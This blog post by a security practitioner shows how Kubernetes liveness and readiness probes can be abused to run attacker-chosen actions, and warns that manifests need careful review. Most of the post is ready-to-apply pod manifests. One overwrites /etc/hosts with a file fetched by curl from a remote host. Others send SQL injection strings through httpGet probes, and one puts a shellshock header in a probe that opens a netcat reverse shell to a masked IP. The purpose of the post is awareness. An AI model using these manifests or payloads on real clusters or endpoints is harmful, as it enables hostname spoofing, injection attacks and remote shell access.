Exploiting applications using liveness probes in Kubernetes

Introduction

Startup, readiness, and liveness probes are very well described in the Kubernetes documentation. kubelet uses these probes defined in the pod manifest to verify whether a pod is booting, ready to accept traffic and still alive. It is kubelet who actually executes the probes (and not the pod itself).

There are different ways the probes are executed.

  • httpGet
  • exec

The problems described here are considered ‘as designed’, as you should download containers from a trusted source according to the reviewers.

The examples below shows that trusted sources of container images will not solve the problem, neither will image scanning.

To prevent an attack from happening, it is mandatory to scan the Kubernetes pod and deployment manifests rigorously before deploying (and not use any pre-canned examples :-))

Example 1: Overwriting files on the pod filesystem

This example overwrites the pods /etc/hostfile to spoof hostnames.

kubectl apply -f - <<EOF
apiVersion: v1
kind: Pod
metadata:
labels:
test: liveness
name: liveness-exec15
spec:
containers:
- name: liveness
image: xxradar/hackon
args:
- /bin/sh
- -c
- touch /tmp/healthy;sleep 600
livenessProbe:
exec:
command:
- curl
- www.xxxxx.com/host.txt
- -o
- /etc/hosts
initialDelaySeconds: 5
periodSeconds: 5
EOF

Example 2: Installing applications in a pod at deployment time

kubectl apply -f - <<EOF
apiVersion: v1
kind: Pod
metadata:
labels:
test: liveness
name: liveness-exec39
spec:
containers:
- name: liveness
image: ubuntu
args:
- /bin/sh
- -c
- touch /tmp/healthy;sleep 600
readinessProbe:
exec:
command:
- apt-get
- update
initialDelaySeconds: 5
periodSeconds: 10
timeoutSeconds: 60
livenessProbe:
exec:
command:
- apt-get
- install
- -y
- curl
initialDelaySeconds: 60
periodSeconds: 100
timeoutSeconds: 60
EOF

Example 3: Attacking http(s) endpoints using sql injection, XXS, …

kubectl apply -f - <<EOF
apiVersion: v1
kind: Pod
metadata:
labels:
test: liveness
name: liveness3
spec:
containers:
- name: liveness
image: ubuntu
args:
- /bin/sh
- -c
- touch /tmp/healthy;sleep 600
livenessProbe:
httpGet:
host: www.xxxx.com
path: /?'OR 1=1--
port: 8080
httpHeaders:
- name: User-Agent
value: xxxxxxxxx
EOF

Example 4 : Attacking http(s) endpoints using shellshock

apiVersion: v1
kind: Pod
metadata:
name: radarhack-pod3
labels:
pod: radarhack
spec:
containers:
- name: radarhack
image: docker.io/xxradar/naxsi5
ports:
- containerPort: 80
livenessProbe:
httpGet:
host: www.xxxxx.com
path: /index.html?test=' or 1=1--
port: 8080
httpHeaders:
- name: Custom-Header
value: Awesome
- name: X-Frame-Options
value: () { :;};echo;/bin/nc -e /bin/bash 1.1.x.x 443
initialDelaySeconds: 3
periodSeconds: 3

Conclusion

Many things are written on securely deploying applications on kubernetes. Keep in mind that all aspects need full attention and generating and building Kubernetes manifest is also developping code.

 by the author.

--

--

--

#BruCON co-founder, #OWASP supporter, Application Delivery and Web Application Security, #Kubernetes and #container, #pentesting enthousiast, BBQ & cocktails !!

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Managing Oracle Cloud Infrastructure iSCSI Block Volume attachments with Terraform

How to think like a computer — no shit, I’m gonna do this with a kid’s game.

CSS Float: How I Make Elements Float to the Left or the Right

How I helped my partner learn to code

OpenBOM and Platform Business

Batch Processing: Well-defined Data Pipelines

ElectrumSV 1.3.4

9 Tools To Increase Account Managers Efficiency

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Philippe Bogaerts

Philippe Bogaerts

#BruCON co-founder, #OWASP supporter, Application Delivery and Web Application Security, #Kubernetes and #container, #pentesting enthousiast, BBQ & cocktails !!

More from Medium

Newsletter of Carlos Santana — Issue #24

Kiali releases 1.44 and 1.45: Features update

Demonstration of self-healing feature in Kubernetes

Kubernetes scheduling our way